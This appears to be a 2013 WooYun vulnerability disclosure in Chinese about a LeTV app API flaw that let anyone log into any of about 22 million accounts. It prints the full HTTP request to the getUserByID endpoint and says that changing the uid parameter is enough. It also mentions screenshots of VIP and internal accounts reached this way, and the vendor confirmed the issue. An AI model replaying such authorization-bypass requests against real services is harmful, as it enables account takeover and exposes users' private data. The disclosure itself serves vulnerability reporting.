当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041489

漏洞标题:乐视网2200万用户任意用户登录

相关厂商:乐视网

漏洞作者: zzR

提交时间:2013-10-30 17:29

修复时间:2013-12-14 17:30

公开时间:2013-12-14 17:30

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-30: 细节已通知厂商并且等待厂商处理中
2013-10-30: 厂商已经确认,细节仅向厂商公开
2013-11-09: 细节向核心白帽子及相关领域专家公开
2013-11-19: 细节向普通白帽子公开
2013-11-29: 细节向实习白帽子公开
2013-12-14: 细节向公众公开

简要描述:

最近比较关注,这可能是一个新的安全点!!!

详细说明:

乐视APP缺陷导致2000W用户任意登录
登录抓包吧

GET /android/dynamic.php?mod=passport&ctl=index&act=getUserByID&uid=2*&pcode=010210000&version=5.0 HTTP/1.1
Host: dynamic.app.m.letv.com
Connection: keep-alive
Accept-Language: zh-Hans;q=1, en;q=0.9, zh-Hant;q=0.8, fr;q=0.7, de;q=0.6, ja;q=0.5
User-Agent: LetvIphoneClient/5.0 (iPhone; iOS 7.0.3; Scale/2.00)


修改任意uid即可

漏洞证明:

看几张图片就行了
1#进个vip

vip.jpg


交易详情

vip2.jpg


2#第20000000用户

2kw.jpg


3#第一位内部用户

1.jpg

修复方案:

just the begining

版权声明:转载请注明来源 zzR@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-10-30 18:22

厂商回复:

感谢挖掘,此问题我们在筛查一下,尽快修复。

最新状态:

暂无